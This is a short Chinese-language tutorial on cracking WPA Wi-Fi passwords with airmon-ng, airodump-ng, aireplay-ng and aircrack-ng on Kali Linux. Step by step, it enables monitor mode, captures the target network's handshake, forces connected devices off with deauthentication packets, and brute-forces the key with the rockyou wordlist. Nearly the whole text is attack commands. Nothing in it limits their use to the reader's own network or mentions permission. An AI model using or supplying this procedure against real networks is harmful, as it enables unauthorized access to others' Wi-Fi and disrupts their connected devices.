环境:kali系统+无线网卡(vm虚拟机能识别到)
这种攻击需要字典文件,一个好的字典至关重要。
我以Kali Linux自带的rockyou字典为例,位于/user/share/wordlists/rockyou.txt.gz
使用前先解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz
1)首先断开连接的wifi
airmon-ng
2)开启无线网卡的监控模式
airmon-ng start wlan0
执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看
3)查看wifi网络
airodump-ng wlan0mon
上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID
按Ctrl-C结束
4)抓取握手包
airodump-ng -c 6 –bssid [wifimac地址BSSID] -w ~/ wlan0mon
(注:-c指定频道号 –bssid指定路由器bssid -w指定抓取的数据包保存位置)
5)强制连接到wifi的设备重新连接路由器
aireplay-ng -0 2 -a [wifimac地址BSSID] -c [STATION就是连接设备的MAC地址] wlan0mon
(注:若出现
Couldn’t determine current channel for wlan0mon, you should either force the operation with – ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
情况,则ifconfig wlan0 down再试上条命令)
airmon-ng stop wlan0mon
6) 开始破解密码
aircrack-ng -a2 -b [WPA handshake] -w /usr/share/wordlists/rockyou.txt ~/*.cap
(注:-a2代表WPA的握手包 -b指定要破解的wifi BSSID。 -w指定字典文件 最后是抓取的包)